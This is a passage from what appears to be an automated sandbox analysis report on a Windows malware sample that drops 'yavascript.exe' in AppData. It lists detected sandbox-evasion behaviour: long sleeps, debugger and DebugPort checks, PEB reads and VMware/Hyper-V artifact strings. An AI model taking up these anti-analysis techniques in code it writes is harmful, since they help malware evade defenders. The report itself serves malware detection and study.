            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

            Malware Analysis System Evasion

            barindex
            Delayed program exit found
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0040E54F Sleep,ExitProcess,0_2_0040E54F
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_020FE7B6 Sleep,ExitProcess,0_2_020FE7B6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0040E54F Sleep,ExitProcess,17_2_0040E54F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0075E7B6 Sleep,ExitProcess,17_2_0075E7B6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0040E54F Sleep,ExitProcess,20_2_0040E54F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0213E7B6 Sleep,ExitProcess,20_2_0213E7B6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0040E54F Sleep,ExitProcess,38_2_0040E54F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0218E7B6 Sleep,ExitProcess,38_2_0218E7B6
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_004198C2
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,0_2_02109B29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_004198C2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_00769B29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,20_2_004198C2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,20_2_02149B29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,38_2_004198C2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,38_2_02199B29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeWindow / User API: threadDelayed 9741
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeEvaded block: after key decisiongraph_0-88307
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeEvaded block: after key decisiongraph_0-88281
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeAPI coverage: 3.6 %
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeAPI coverage: 6.3 %
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeAPI coverage: 3.4 %
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeAPI coverage: 3.4 %
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe TID: 4876Thread sleep count: 252 > 30
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe TID: 4876Thread sleep time: -756000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe TID: 4876Thread sleep count: 9741 > 30
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe TID: 4876Thread sleep time: -29223000s >= -30000s
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040B335
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0041B42F
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040B53A
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0044D5E9 FindFirstFileExA,0_2_0044D5E9
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,0_2_004089A9
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00406AC2 FindFirstFileW,FindNextFileW,0_2_00406AC2
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_00407A8C
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00418C69
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,0_2_00408DA7
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_020F900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_020F900E
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0210B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,0_2_0210B696
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_020FB59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_020FB59C
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0213D850 FindFirstFileExA,0_2_0213D850
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_02108ED0 FindFirstFileW,0_2_02108ED0
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_020F7CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,0_2_020F7CF3
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_020F6D29 FindFirstFileW,FindNextFileW,0_2_020F6D29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,17_2_0041B42F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040B53A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0044D5E9 FindFirstFileExA,17_2_0044D5E9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,17_2_004089A9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00406AC2 FindFirstFileW,FindNextFileW,17_2_00406AC2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,17_2_00407A8C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00418C69
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,17_2_00408DA7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0075900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0075900E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0075B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0075B59C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0076B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,17_2_0076B696
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0079D850 FindFirstFileExA,17_2_0079D850
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00757CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,17_2_00757CF3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00756D29 FindFirstFileW,FindNextFileW,17_2_00756D29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00768ED0 FindFirstFileW,17_2_00768ED0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,20_2_0041B42F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,20_2_0040B53A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0044D5E9 FindFirstFileExA,20_2_0044D5E9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,20_2_004089A9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00406AC2 FindFirstFileW,FindNextFileW,20_2_00406AC2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,20_2_00407A8C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,20_2_00418C69
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,20_2_00408DA7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0213900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_0213900E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0214B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,20_2_0214B696
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0213B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0213B59C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0217D850 FindFirstFileExA,20_2_0217D850
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02148ED0 FindFirstFileW,20_2_02148ED0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02137CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,20_2_02137CF3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02136D29 FindFirstFileW,FindNextFileW,20_2_02136D29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,38_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,38_2_0041B42F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,38_2_0040B53A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0044D5E9 FindFirstFileExA,38_2_0044D5E9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,38_2_004089A9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00406AC2 FindFirstFileW,FindNextFileW,38_2_00406AC2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,38_2_00407A8C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,38_2_00418C69
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,38_2_00408DA7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0218900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,38_2_0218900E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0219B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,38_2_0219B696
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0218B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,38_2_0218B59C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021CD850 FindFirstFileExA,38_2_021CD850
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02198ED0 FindFirstFileW,38_2_02198ED0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02187CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,38_2_02187CF3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02186D29 FindFirstFileW,FindNextFileW,38_2_02186D29
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00406F06
            Source: Amcache.hve.4.drBinary or memory string: VMware
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
            Source: yavascript.exe, 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxt
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
            Source: yavascript.exe, 00000011.00000003.2391005348.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625362582.00000000008D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
            Source: yPIOW6yoPi.exe, 00000000.00000002.2295191627.00000000005BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y!
            Source: yavascript.exe, 00000011.00000003.2391005348.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625362582.00000000008D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.4.drBinary or memory string: vmci.sys
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeAPI call chain: ExitProcess graph end nodegraph_17-88579
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeAPI call chain: ExitProcess graph end nodegraph_17-87753
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0043A65D
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCE3
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00442554 mov eax, dword ptr fs:[00000030h]0_2_00442554
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00530083 push dword ptr fs:[00000030h]0_2_00530083
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_021327BB mov eax, dword ptr fs:[00000030h]0_2_021327BB
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_020F092B mov eax, dword ptr fs:[00000030h]0_2_020F092B
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_020F0D90 mov eax, dword ptr fs:[00000030h]0_2_020F0D90
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00442554 mov eax, dword ptr fs:[00000030h]17_2_00442554
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_005F0083 push dword ptr fs:[00000030h]17_2_005F0083
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_007927BB mov eax, dword ptr fs:[00000030h]17_2_007927BB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0075092B mov eax, dword ptr fs:[00000030h]17_2_0075092B
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00750D90 mov eax, dword ptr fs:[00000030h]17_2_00750D90
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00442554 mov eax, dword ptr fs:[00000030h]20_2_00442554
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00600083 push dword ptr fs:[00000030h]20_2_00600083
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_021727BB mov eax, dword ptr fs:[00000030h]20_2_021727BB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0213092B mov eax, dword ptr fs:[00000030h]20_2_0213092B
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02130D90 mov eax, dword ptr fs:[00000030h]20_2_02130D90
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00442554 mov eax, dword ptr fs:[00000030h]38_2_00442554
